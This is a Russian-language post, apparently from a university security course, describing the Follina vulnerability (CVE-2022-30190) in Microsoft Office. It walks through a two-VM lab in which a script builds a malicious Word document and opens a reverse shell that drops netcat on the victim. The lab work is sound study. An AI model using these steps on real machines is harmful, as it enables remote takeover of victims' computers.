Follina (CVE-2022-30190) — это уязвимость нулевого дня в Microsoft Office, которая была недавно обнаружена. Это уязвимость высокой степени серьезности, которую хакеры могут использовать для атак с удаленным выполнением кода (RCE).
Amine TITROFINE | 17 декабря 2022
Follina (CVE-2022-30190) — это недавно обнаруженная уязвимость нулевого дня в Microsoft Office. Это уязвимость высокой степени серьезности, которую хакеры могут использовать для атак удаленного выполнения кода (RCE). Она возникает, когда MSDT вызывается с использованием протокола URL из вызывающего приложения, такого как Word. Злоумышленник, успешно использующий эту уязвимость, может выполнить произвольный код с правами вызывающего приложения. Затем злоумышленник может устанавливать программы, просматривать, изменять или удалять данные, а также создавать новые учетные записи в контексте, разрешенном правами пользователя.
2 ВМ:
$ git clone https://gitlab.com/grenoble-inp-ensimag/Secu3A/Devoir1/CVE_2022_30190_amine_titrofine_farah_ben_youssef_walid_lanjri.git
$ cd CVE_2022_30190_amine_titrofine_farah_ben_youssef_walid_lanjri
$ python3 follina.py –r 9999
После запуска программы follina.py появится файл (follina.doc), содержащий вредоносный скрипт.
Чтобы упростить обмен файлами между двумя ВМ, мы будем использовать Python HTTP-сервер:
$ python3 –m http.server 8080
Получить обратную оболочку на порту 9999. Примечание: это загружает бинарный файл netcat на машину жертвы и помещает его в C:\Windows\Tasks. Бинарный файл не удаляется. Это вызовет обнаружение антивирусом, если антивирус не отключен.
$ python3 follina.py -r 9999
Запуск calc.exe:
$ python3 follina.py -c "calc"
[+] скопирован промежуточный doc /tmp/9mcvbrwo
[+] создан вредоносный документ ./follina.doc
[+] раздача html-полезной нагрузки на :8000
Запуск notepad.exe:
$ python3 follina.py -c "notepad"